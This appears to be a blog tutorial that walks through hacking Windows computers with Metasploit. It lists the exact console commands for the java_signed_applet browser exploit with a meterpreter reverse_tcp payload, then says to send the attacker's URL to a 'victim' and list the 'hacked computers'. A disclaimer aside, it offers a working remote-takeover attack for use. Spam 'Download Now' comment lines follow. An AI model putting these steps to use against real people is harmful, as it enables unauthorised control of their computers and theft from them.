This will be the first in a series of windows hacking tutorials using metasploit. The Metasploit Framework is one of the most valuable tools to a hacker/pentester. It allows you to use exploits in windows machines to open a meterpreter session and gain control of the victim's computer.
This tutorial will teach you a simple way to exploit a windows machine using metasploit.
THIS IS FOR EDUCATIONAL PURPOSES ONLY!!!
I AM NOT RESPONSIBLE FOR MISUSE
THIS IS FOR EDUCATIONAL PURPOSES ONLY!!!
I AM NOT RESPONSIBLE FOR MISUSE
MSFCONSOLE |
DIFFICULTY: 2
- Open up backtrack
- Open Terminal
- Type 'ifconfig'
- Write down your ip address
- Open a new Terminal window
- Type 'msfconsole' (Metasploit should look like in picture on top)
- Type 'use exploit/multi/browser/java_signed_applet' then hit enter
- Type 'set payload windows/meterpreter/reverse_tcp' then hit enter
- Type 'set lhost 192.168.1.110' (CHANGE 192.168.1.110 TO THE IP ADDRESS YOU WROTE IN STEP 4)
- Type 'set lport 443' then hit enter
- Type 'set srvport 80' then hit enter
- Type 'set uripath NotSoElite' (YOU CAN CHANGE NotSoElite TO ANY NAME)
- Type 'exploit' then hit enter---------------(SEE IMAGE BELOW)
- Now send
'http://youripaddress:80/step12'
to the victim's computer and they
will be hacked - Use 'sessions -l' to see hacked computers
- DONE!
THANKS TO D@RK TruTH FOR ORIGINAL TUTORIAL AND PICS
(‾⌣‾)♉ PEACE!
The Not So Elite Haxor: Hacking Windows With Metasploit (Tutorial 1) >>>>> Download Now
ReplyDelete>>>>> Download Full
The Not So Elite Haxor: Hacking Windows With Metasploit (Tutorial 1) >>>>> Download LINK
>>>>> Download Now
The Not So Elite Haxor: Hacking Windows With Metasploit (Tutorial 1) >>>>> Download Full
>>>>> Download LINK eu